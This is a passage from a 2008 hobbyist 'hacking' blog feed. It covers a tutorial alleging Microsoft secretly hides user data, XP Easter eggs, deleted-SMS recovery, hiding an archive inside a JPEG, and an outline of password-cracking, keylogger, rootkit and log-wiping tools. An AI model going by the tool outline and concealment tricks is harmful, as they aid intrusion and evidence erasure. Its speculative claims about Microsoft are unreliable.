/&gt;Lp0QAAAAUAAAAAMAAABDQ0OtwIEAAAAAgCDY+CGWOLMAUEsDBBQAAAAIADKFjiqyEuVgEAAAAFAA&lt;br /&gt;AAADAAAARERErcCBAAAAAIAg2fgdljizAFBLAQIUABQAAAAIACeFjip9jZkaEAAAAFAAAAADAAAA&lt;br /&gt;AAAAAAEAIAAAAAAAAABBQUFQSwECFAAUAAAACAArhY4qOPhNMxAAAABQAAAAAwAAAAAAAAABACAA&lt;br /&gt;AAAxAAAAQkJCUEsBAhQAFAAAAAgALoWOKsTWLp0QAAAAUAAAAAMAAAAAAAAAAQAgAAAAYgAAAEND&lt;br /&gt;Q1BLAQIUABQAAAAIADKFjiqyEuVgEAAAAFAAAAADAAAAAAAAAAEAIAAAAJMAAABERERQSwUGAAAA&lt;br /&gt;AAQABADEAAAAxAAAAAAA&lt;br /&gt;Cheers to the first person to discover the algorithm.&lt;br /&gt;Anyway, by now you are probably wishing you knew where these records were kept. Don't worry they're right here:&lt;br /&gt;&lt;br /&gt;c:program filesinternet mail and news%user%mail*.mbx&lt;br /&gt;(replace %user% with the name you use.)&lt;br /&gt;Or, if you're lucky:&lt;br /&gt;&lt;br /&gt;c:windowsapplication datamicrosoftoutlookmail*.mbx&lt;br /&gt;I found it odd that the first time I installed outlook, my e-mail data was saved automatically into "internet mail and news." After I uninstalled and reinstalled, it changed its mind and put it into my "application data."&lt;br /&gt;To erase these files simply type: (of course if you do this you will kill all of your e-mail messages, so backup what you want to keep.)&lt;br /&gt;&lt;br /&gt;Deltree c:windowsintern~1%user%mail&lt;br /&gt;or&lt;br /&gt;&lt;br /&gt;Deltree c:windowsapplic~1micros~1outloo~1mail&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;6. HOW MICROSOFT DOES IT&lt;br /&gt;Ever wonder how Microsoft makes these folders invisible to both DOS and Windows Explorer? I was completely baffled by how Microsoft was accomplishing this since even using a DOS 6.2 boot disk wouldn't work for me. I was honestly pretty upset that the answer escaped me for so long, but after wondering around in the folders I finally figured it out.&lt;br /&gt;The "desktop.ini" is a standard text file that can be added to any folder to customize certain aspects of the folder's behavior. In these cases, Microsoft utilized the desktop.ini file to make these files invisible. Invisible to Windows Explorer, invisible to DOS, and even invisible to the "Find" Utility (so you wouldn't be able to perform searches in these folders!)&lt;br /&gt;Here are a couple examples:&lt;br /&gt;Found in the c:windowstemporary internet filesdesktop.ini and the c:windowstemporary internet filescontent.ie5desktop.ini contains this text:&lt;br /&gt;&lt;br /&gt;[.ShellClassInfo]&lt;br /&gt;UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}&lt;br /&gt;Found in the c:windowshistorydesktop.ini and the c:windowshistoryhistory.ie5desktop.ini contains this text:&lt;br /&gt;&lt;br /&gt;[.ShellClassInfo]&lt;br /&gt;UICLSID={7BD29E00-76C1-11CF-9DD0-00A0C9034933}&lt;br /&gt;CLSID={FF393560-C2A7-11CF-BFF4-444553540000}&lt;br /&gt;The UICLSID line cloaks the folder in both DOS and Explorer. The CLSID line disables the "FIND" utility from searching through the folder. Additionally, it gives a folder the appearance of the "History" folder. (You'll know what I mean if you fiddle with them enough.)&lt;br /&gt;Erasing these desktop.ini files will give DOS and Windows Explorer proper viewing functionality once again. The problem with erasing them is windows will reconstruct them on your next bootup. The workaround is to edit the desktop.ini files and remove everything except for the [.ShellClassInfo]. This will trick windows into thinking they have still covered their tracks, so they won't think to reconstruct them again.&lt;br /&gt;By the way, if you erase these keys from your Registry it will not un-hide these folders. Still, I'm sure somebody could play with this enough to figure out a way to completely disable Microsoft from ever hiding files on your computer again.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;7. +S MEANS [S]ECRET NOT [S]YSTEM&lt;br /&gt;Here are three easy true or false questions regarding DOS. Play along like you needed to know the answers to get your A+ certification.&lt;br /&gt;1) True or false: Executing the dir/s command in root will display all the "normal" files and directories on your hard drive.&lt;br /&gt;The correct answer is 'true.'&lt;br /&gt;2) True or false: Executing the dir/s/ah command in root will display all the "hidden" files and directories on your hard drive.&lt;br /&gt;Again, the correct answer is 'true.'&lt;br /&gt;3) True or false: Executing the dir/s/as command in root will display all the "system" files and directores on your hard drive.&lt;br /&gt;The correct answer is 'you wish.'&lt;br /&gt;When DOS tries to get a list of the subdirectories of any +s[ystem] folder it hits a brick wall. Not only does this mean Microsoft has taken extra precautions to keep people from finding these files, but it defeats the whole purpose of the "/s" switch in the first place. Nice one.&lt;br /&gt;In case you didn't understand, here's a small experiment that will show you what I mean.&lt;br /&gt;Since the content.ie5 and history.ie5 subfolders are both located within a +s[ystem] folder, we will run the experinment with them. The proper command to locate them should be this:&lt;br /&gt;&lt;br /&gt;CD&lt;br /&gt;DIR *.IE5 /s/as&lt;br /&gt;The problem is that you will receive a "No files found" error message.&lt;br /&gt;This proves that all subfolders/files that are located within a system folder will not be listed. But believe me, it's there.&lt;br /&gt;Now, the really interesting thing is that you (luckily) can get around this brick wall. That is, once you are in the system folder, then the brick wall no longer has an effect on the directory listings. For example:&lt;br /&gt;&lt;br /&gt;CDWINDOWSTEMPOR~1&lt;br /&gt;DIR *.IE5 /as&lt;br /&gt;1 folder(s) found.&lt;br /&gt;Oh good, now you can see them. (But only after you knew the exact location.) In other words, if you didn't know the folders existed then finding them would be almost impossible.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;8. THE TRUTH ABOUT FIND FAST&lt;br /&gt;Have you ever wondered what that "Find Fast" program was under your control panel? I've spent about an hour on microsoft.com reading help files and I STILL have no clue of what it's good for. Here's the most informative snippet I found on microsoft.com.&lt;br /&gt;"The Find Fast Indexer is a utility that builds indexes to speed finding documents using the Open and Open Office Documents commands in Microsoft Office programs, including Microsoft Outlook."&lt;br /&gt;So what does that mean? Well, if you read it carefully you'll see that Microsoft never mentions that it will speed up your searches. In fact it has nothing to do with the "Find: Files or Programs" utility. I think what Microsoft is really trying to say is that when you go to "File" &gt; "Open" under Microsoft Word, then your list of documents will be displayed quicker.&lt;br /&gt;If that is what they are saying then it is a lie. I hope you don't think I am taking Microsoft's quote out of context here. I'm only trying to show you all the methods that Microsoft went through to make it appear that the Find Fast utility speeds up searches.&lt;br /&gt;For example if you go to "Edit" (under Microsoft Word), you will notice there is a "Fast Find" icon next to it. (Binoculars icon.) This is usally a clear indication that it is related to the Find Fast program. However, if you re-read that quote, it doesn't mention anything about finding words "within" a document, but only the document itself. Here are some more quotes from Microsoft:&lt;br /&gt;"The Find Fast Indexer tool tracks the location on the hard disk of all Microsoft Word for Windows documents by default. When one of these files is moved, the Find Faster Indexer tool updates its index."&lt;br /&gt;"Indexes are used to make file searches faster in Office programs."&lt;br /&gt;"The Find Fast Indexer is installed on your computer when you install Microsoft Office 97. Find Fast builds an index to speed up finding documents from the Open dialog box in Microsoft Office programs."&lt;br /&gt;I wasn't able to find one single shred of evidence that it helped you "search" faster. Yet, Microsoft insisted on calling the program "Find Fast." THEN they decided to add the Find Fast icon next to the [Search Document], as if Find Fast had anything to do with searching the document.&lt;br /&gt;So now do you think you know the truth?&lt;br /&gt;What would you say if I told you that Find Fast was scanning and indexing every single file on your hard drive? Did you know that in Office 95, the Find Fast Indexer had an "exclusion" list comprised of .exe, .swp, .dll and other extensions, but the feature was eliminated? If you were a programmer, would you program Find Fast to index every single file, or just the ones with Office extensions?&lt;br /&gt;Here are some other interesting facts:&lt;br /&gt;Find Fast automatically loads on every boot (because it added to your Startup folder.)&lt;br /&gt;If you have ever had problems with scandisk (restarting due to "disk writes."), it is because Find Fast was indexing your hard drive in the background.&lt;br /&gt;Now here is a good example of the lengths Microsoft has gone through to keep people from finding out Find Fast indexes their hard drives. (Always good to have an alibi.) And I quote:&lt;br /&gt;"When you specify the type of documents to index in the Create Index dialog box, Find Fast includes the document types that are listed in the following table.&lt;br /&gt;Doc Type File Name Extension&lt;br /&gt;Microsoft Office files All the Microsoft Excel, Microsoft Web documents PowerPoint, Microsoft Project, and Microsoft Word document types listed in this table. Microsoft Binder (.odb, .obt) and Microsoft Access (.mdb) files. Note that in .mdb files, only document properties are indexed.&lt;br /&gt;Microsoft Excel workbooks .xl* files&lt;br /&gt;Microsoft PowerPoint files .ppt (presentation), .pot (template), .pps (auto-running presentation) files&lt;br /&gt;Microsoft Project files .mpp, .mpw, .mpt, .mpx, .mpd files&lt;br /&gt;Microsoft Word documents .doc (document), .dot (template), .ht* (Hypertext Markup Language document), .txt (text file), .rtf (Rich Text Format) files&lt;br /&gt;All files *.* files&lt;br /&gt;&lt;br /&gt;Did you get that last part? If you were a wealthy man and you decided to buy every single car in the car lot, would you&lt;br /&gt;a) Say, "I'll take the red ones, the blue ones, the silver ones, the white ones, the champagne ones, and all of them," or&lt;br /&gt;b) "I'll take them all sir."&lt;br /&gt;As you can see, they don't want people to realize that Find Fast is keeping an index of your entire hard drive. They walk around the car lot saying "I'll take the red ones, the blue ones, the silver ones,..."&lt;br /&gt;I personally witnessed the Find Fast Indexer "creep" its way back into my Startup folder after I removed it. There's no possible way I could have done this on purpose. In fact the only way I could have done it is if I created a shortcut to Find Fast and then moved the shortcut into Startup manually. There's no option on the Find Fast program to add it to Startup.&lt;br /&gt;Am I making this up? Did I imagine it? Well, even if I am, then that doesn't change the overwhelming amount of inconsistencies. For example:&lt;br /&gt;1) Drop to DOS&lt;br /&gt;2) CD&lt;br /&gt;3) DIR FF*.* /AH (This will bring up a listing of ffast-related files.)&lt;br /&gt;4) edit /75 %ff% (insert %ff% with any of the names that were listed.)&lt;br /&gt;Notice the incredible amount of disk accesses to your "really hidden" "Temporary Internet Files" folder? What is the obsession that Find Fast has with these hidden folders, anyway?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;8.1. REMOVING THE FIND FAST PROGRAM&lt;br /&gt;1) Reboot your computer in MS-DOS Mode.&lt;br /&gt;2) Delete the FindFast.CPL file from c:windowssystem&lt;br /&gt;3) Delete the shortcut under c:windowsstart menuprogramsstartup&lt;br /&gt;4) Delete the FindFast.EXE file from c:progra~1micros~1office&lt;br /&gt;Other related files that are safe to erase:&lt;br /&gt;5) FFNT.exe, FFSetup.dll, FFService.dll, FFast_bb.dll, "c:&gt;ff*.*"&lt;br /&gt;Notice you will loose no functionality after erasing these files? Actually, you will gain functionality.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;9. HOW HARD MICROSOFT TRIED TO KEEP PEOPLE FROM FINDING ABOUT IT&lt;br /&gt;In case the desktop.ini file wasn't enough proof. ("Whoops, we didn't know the desktop.ini file would turn folders invisible?") And in case you thought disabling DOS's "/s" switch for system folders was just a "bug." And in case you thought Microsoft disabled the Find utility from searching through the folders just to save you time (uh huh) -- then feel free to check out this thread on the Hackers.com BBS.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;10. FINAL NOTE AND CONTACT INFO&lt;br /&gt;This tutorial is being updated ALL THE TIME. If you have any input then please e-mail me so I can compile it into future versions. You may have noticed many requests to contact me throughout this tutorial. This is because I am very eager to find out everything there is to know about this. But just so I am not swamped with old updates, please make sure you are reading the most current version.&lt;br /&gt;My e-mail address is located below. Although it may not be done in a timely fasion, I always reply to all of my e-mail. By the way, I deleted my PGP due to security reasons. So if you want to contact me privately, then I'm sure we can work out something else.&lt;br /&gt;Thanks for reading, -- The Riddler&lt;br /&gt;e-mail: mailto:ther1ddler@fuckmicrosoft.com?Subject=Feedback from fuckMicrosoft.com Article&lt;br /&gt;hangout: http://www.hackers.com/bulletin/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;10.1. RECOMMENDED READING&lt;br /&gt;And if you aren't already paranoid enough here's some sites/articles that I definitely reccomend:&lt;br /&gt;http://www.theregister.co.uk/content/4/18002.html&lt;br /&gt;http://www.findarticles.com/m0CGN/3741/55695355/p1/article.jhtml&lt;br /&gt;http://www.mobtown.org/news/archive/msg00492.html&lt;br /&gt;http://194.159.40.109/05069801.htm&lt;br /&gt;http://www.yarbles.demon.co.uk/mssniff.html&lt;br /&gt;http://www.macintouch.com/o98security.html&lt;br /&gt;http://www.theregister.co.uk/content/archive/3079.html&lt;br /&gt;http://www.fsm.nl/ward/&lt;br /&gt;http://slashdot.org/&lt;br /&gt;http://www.peacefire.org/&lt;br /&gt;http://stopcarnivore.org/&lt;br /&gt;http://nomorefakenews.com/&lt;br /&gt;http://grc.com/steve.htm#project-x&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;11. SPECIAL THANKS&lt;br /&gt;Thank you Skywalker, for being in the right place at the right time. You were the only one who seemed interested in helping me further my research.&lt;br /&gt;Thank you to everybody who has e-mailed me specifically just to thank me. The kind words mean a lot to me and played a big motivator to get this text finished.&lt;br /&gt;And thank you to Hackers.com, for developing a fantatsic site with a great community feel, without which, this tutorial would never have existed.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;12. REFERENCES&lt;br /&gt;http://support.microsoft.com/support/kb/articles/Q137/1/13.asp&lt;br /&gt;http://support.microsoft.com/support/kb/articles/Q136/3/86.asp&lt;br /&gt;http://support.microsoft.com/support/kb/articles/Q169/5/31.ASP&lt;br /&gt;http://support.microsoft.com/support/kb/articles/Q141/0/12.asp&lt;br /&gt;http://support.microsoft.com/support/kb/articles/Q205/2/89.ASP&lt;br /&gt;http://support.microsoft.com/support/kb/articles/Q166/3/02.ASP&lt;br /&gt;http://www.insecure.org/sploits/Internet.explorer.web.usage.logs.html&lt;br /&gt;http://www.parascope.com/cgi-bin/psforum.pl/topic=matrix&amp;disc=514&amp;mmark=all&lt;br /&gt;http://www.hackers.com/bulletin/&lt;br /&gt;http://slashdot.org/articles/00/05/11/173257.shtml&lt;br /&gt;http://peacefire.org/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8195468679170844724?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8195468679170844724/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8195468679170844724' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8195468679170844724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8195468679170844724'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/information-microsoft-hides-on-your.html' title='The Information Microsoft Hides on Your Computer'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5715286716806551901</id><published>2008-09-26T12:18:00.001-07:00</published><updated>2008-09-26T12:18:38.683-07:00</updated><title type='text'>XP HIDDEN SECREATES</title><content type='html'>Defrag&lt;br /&gt;&lt;br /&gt;Secret - Hidden Command Line Switch&lt;br /&gt;&lt;br /&gt;Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information. Similar to what BootVis invokes.&lt;br /&gt;&lt;br /&gt;Paint&lt;br /&gt;&lt;br /&gt;Secret - Image Trails&lt;br /&gt;&lt;br /&gt;Instructions - Open an image and hold down Shift then drag the image around to create an image trail.&lt;br /&gt;&lt;br /&gt;Secret - 10x Zoom&lt;br /&gt;&lt;br /&gt;Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x.&lt;br /&gt;&lt;br /&gt;Game Secrets&lt;br /&gt;&lt;br /&gt;FreeCell&lt;br /&gt;&lt;br /&gt;Secret - Instant Win&lt;br /&gt;&lt;br /&gt;Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.&lt;br /&gt;&lt;br /&gt;Secret - Hidden Game Modes&lt;br /&gt;&lt;br /&gt;Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.&lt;br /&gt;&lt;br /&gt;Minesweeper&lt;br /&gt;&lt;br /&gt;Secret - Reveal Mines&lt;br /&gt;&lt;br /&gt;Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.&lt;br /&gt;&lt;br /&gt;Pinball&lt;br /&gt;&lt;br /&gt;Secret - Extra Balls&lt;br /&gt;&lt;br /&gt;Instructions - Type 1max at the start of a new ball to get extra balls.&lt;br /&gt;&lt;br /&gt;Secret - Gravity Well&lt;br /&gt;&lt;br /&gt;Instructions - Type gmax at the start of a new game to activate the Gravity Well.&lt;br /&gt;&lt;br /&gt;Secret - Instant Promotion&lt;br /&gt;&lt;br /&gt;Instructions - Type rmax at the start of a new game to go up in ranks.&lt;br /&gt;&lt;br /&gt;Secret - Skill Shot&lt;br /&gt;&lt;br /&gt;Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:&lt;br /&gt;&lt;br /&gt;First: 15,000 points&lt;br /&gt;&lt;br /&gt;Second: 30,000 points&lt;br /&gt;&lt;br /&gt;Third: 75,000 points&lt;br /&gt;&lt;br /&gt;Fourth: 30,000 points&lt;br /&gt;&lt;br /&gt;Fifth: 15,000 points&lt;br /&gt;&lt;br /&gt;Sixth: 7,500 points&lt;br /&gt;&lt;br /&gt;Secret - Test Mode&lt;br /&gt;&lt;br /&gt;Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.&lt;br /&gt;&lt;br /&gt;Secret - Unlimited Balls&lt;br /&gt;&lt;br /&gt;Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.&lt;br /&gt;&lt;br /&gt;Solitaire&lt;br /&gt;&lt;br /&gt;Secret - Instant Win&lt;br /&gt;&lt;br /&gt;Instructions - Press Alt + Shift + 2 during game play to instantly win.&lt;br /&gt;&lt;br /&gt;Secret - Draw single cards in a Draw Three game&lt;br /&gt;&lt;br /&gt;Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.&lt;br /&gt;&lt;br /&gt;OS Secrets&lt;br /&gt;&lt;br /&gt;Add/Remove&lt;br /&gt;&lt;br /&gt;Secret - Hidden Uninstall Options&lt;br /&gt;&lt;br /&gt;Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the control panel, "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.&lt;br /&gt;&lt;br /&gt;Control Panel&lt;br /&gt;&lt;br /&gt;Secret - Hidden Control Panel Extensions&lt;br /&gt;&lt;br /&gt;Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.&lt;br /&gt;&lt;br /&gt;Device Manager&lt;br /&gt;&lt;br /&gt;Secret - Hidden Devices&lt;br /&gt;&lt;br /&gt;Instructions - Go to the control panel, "System" icon, "Hardware" tab and select "Device Manager". Select View and Show hidden devices.&lt;br /&gt;&lt;br /&gt;Music&lt;br /&gt;&lt;br /&gt;Secret - Music from the Installer&lt;br /&gt;&lt;br /&gt;Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.&lt;br /&gt;&lt;br /&gt;Shutdown&lt;br /&gt;&lt;br /&gt;Secret - Display Hibernate Option on the Shut Down dialog&lt;br /&gt;&lt;br /&gt;Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".&lt;br /&gt;&lt;br /&gt;Support Tools&lt;br /&gt;&lt;br /&gt;Secret - Over 100 Windows XP Support Utilities are on the install CD&lt;br /&gt;&lt;br /&gt;Instructions for Pre-SP2 users - If you do not have SP2 installed, put the original Windows XP CD in the CD-ROM Drive, run the D:\Support\Tools\setup.exe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-5715286716806551901?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/5715286716806551901/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=5715286716806551901' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5715286716806551901'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5715286716806551901'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/xp-hidden-secreates.html' title='XP HIDDEN SECREATES'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2237017267962555693</id><published>2008-09-26T12:16:00.001-07:00</published><updated>2008-09-26T12:16:46.281-07:00</updated><title type='text'>Read Deleted SMS</title><content type='html'>Read Deleted SMS!!&lt;br /&gt;A SMS once deleted can’t be read again….but sometimes we hurrily delete some important SMS&lt;br /&gt;Here is the technique that must be followed to retrieve deleted SMS.&lt;br /&gt;Required utility:&lt;br /&gt;1) Any system explorer or file explorer program (eg. fileman or fexplorer.provided with the package)&lt;br /&gt;Step 1) Open FexplorerStep&lt;br /&gt;2) Select drive C: or D: depending on the memory in which the Sms messages have been saved.&lt;br /&gt;Step 3) For example u selected c: , Then open “system” folder.&lt;br /&gt;step 4) Then in “system” folder open “mail” folder.&lt;br /&gt;step 5) Then in this folder u will see different folders (eg 0010001_s) and certain files (eg 00100000). These files are the actual messages. Browse through every folder and open all files till u get the sms u are looking for.&lt;br /&gt;Step 6) For opening the files don’t choose options&gt;file&gt;open as it will show format not supported rather choose options&gt;file&gt;hex/text viewer.&lt;br /&gt;By selecting the “Hex/ text viewer” u ll be able to open and read the deleted SMS message&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2237017267962555693?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2237017267962555693/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2237017267962555693' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2237017267962555693'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2237017267962555693'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/read-deleted-sms.html' title='Read Deleted SMS'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-119405038538395898</id><published>2008-09-26T12:15:00.000-07:00</published><updated>2008-09-26T12:16:11.673-07:00</updated><title type='text'>How to hide a file in a image</title><content type='html'>1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration, I will be using C:\New Folder&lt;br /&gt;-The image will hereby be referred to in all examples as fluffy.jpg&lt;br /&gt;-The file will hereby be referred to in all examples as New Text Document.txt&lt;br /&gt;&lt;br /&gt;2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)&lt;br /&gt;&lt;br /&gt;3. Open command prompt by going to Start &gt; Run &gt; cmd&lt;br /&gt;&lt;br /&gt;4. In Command Prompt, navigate to the folder where your two files are by typing&lt;br /&gt;cd location [ex: cd C:\New Folder]&lt;br /&gt;&lt;br /&gt;5. Type [copy /b fluffy.jpg + secret.rar fluffy.jpg] (remove the brackets)&lt;br /&gt;&lt;br /&gt;Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.&lt;br /&gt;&lt;br /&gt;In order to view/extract your file, there are two options that you can take&lt;br /&gt;&lt;br /&gt;a) Change the file extension from fluffy.jpg to fluffy.rar, then open and your file is there&lt;br /&gt;b) Leave the file extension as is, right click, open with WinRar and your file is there&lt;br /&gt;Youtube link&lt;br /&gt;http://www.youtube.com/watch?v=3Blt9-ojabk&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-119405038538395898?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/119405038538395898/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=119405038538395898' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/119405038538395898'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/119405038538395898'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/how-to-hide-file-in-image.html' title='How to hide a file in a image'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8284669014901536386</id><published>2008-09-26T12:14:00.000-07:00</published><updated>2008-09-26T12:15:29.933-07:00</updated><title type='text'>System hacking tips</title><content type='html'>Administrator Password Guessing&lt;br /&gt;Performing Automated Password Guessing&lt;br /&gt;Legion&lt;br /&gt;NTInfoScan&lt;br /&gt;Defending Against Password Guessing&lt;br /&gt;Monitoring Event Viewer Logs&lt;br /&gt;VisualLast&lt;br /&gt;Eavesdroppin on Network Password Exchange&lt;br /&gt;Hacking Tool: L0phtCrack&lt;br /&gt;Hacking Tool: KerbCrack&lt;br /&gt;Privilege Escalation&lt;br /&gt;Hacking Tool: GetAdmin&lt;br /&gt;Hacking Tool: hk&lt;br /&gt;Manual Password Cracking Algorithm&lt;br /&gt;Automatic Password Cracking Algorithm&lt;br /&gt;Password Types&lt;br /&gt;Types of Password Attacks&lt;br /&gt;Dictionary Attack&lt;br /&gt;Brute Force Attack&lt;br /&gt;Distributed Brute Force Attack&lt;br /&gt;Password Change Interval&lt;br /&gt;Hybrid Attack&lt;br /&gt;Cracking Windows 2000 Passwords&lt;br /&gt;Retrieving the SAM file&lt;br /&gt;Redirecting SMB Logon to the Attacker&lt;br /&gt;SMB Redirection&lt;br /&gt;Hacking Tool: SMBRelay&lt;br /&gt;Hacking Tool: SMBRelay2&lt;br /&gt;SMBRelay Man-in-the-Middle (MITM)&lt;br /&gt;SMBRelay MITM Countermeasures&lt;br /&gt;Hacking Tool: SMBGrinder&lt;br /&gt;Hacking Tool: SMBDie&lt;br /&gt;Hacking Tool: NBTDeputy&lt;br /&gt;NetBIOS DoS Attack&lt;br /&gt;Hacking Tool: nbname&lt;br /&gt;Hacking Tool: John the Ripper&lt;br /&gt;LanManager Hash&lt;br /&gt;Password Cracking Countermeasures&lt;br /&gt;Keystroke Logger&lt;br /&gt;Hacking Tool: Spector&lt;br /&gt;AntiSpector&lt;br /&gt;Hacking Tool: eBlaster&lt;br /&gt;Hacking Tool: SpyAnywhere&lt;br /&gt;Hacking Tool: IKS Software Logger&lt;br /&gt;Hardware Tool: Hardware Key Logger&lt;br /&gt;Hacking Tool: Rootkit&lt;br /&gt;Planting Rootkit on Windows 2000 Machine&lt;br /&gt;_rootkit_ embedded TCP/IP Stack&lt;br /&gt;Rootkit Countermeasures&lt;br /&gt;MD5 Checksum utility&lt;br /&gt;Tripwire&lt;br /&gt;Covering Tracks&lt;br /&gt;Disabling Auditing&lt;br /&gt;Auditpol&lt;br /&gt;Clearing the Event Log&lt;br /&gt;Hacking Tool: Elslave&lt;br /&gt;Hacking Tool: Winzapper&lt;br /&gt;Hacking Tool: Evidence Eliminator&lt;br /&gt;Hidding Files&lt;br /&gt;NTFS File Streaming&lt;br /&gt;Hacking Tool: makestrm&lt;br /&gt;NTFS Streams Countermeasures&lt;br /&gt;LNS&lt;br /&gt;Steganography&lt;br /&gt;Hacking Tool: ImageHide&lt;br /&gt;Hacking Tool: MP3Stego&lt;br /&gt;Hacking Tool: Snow&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files 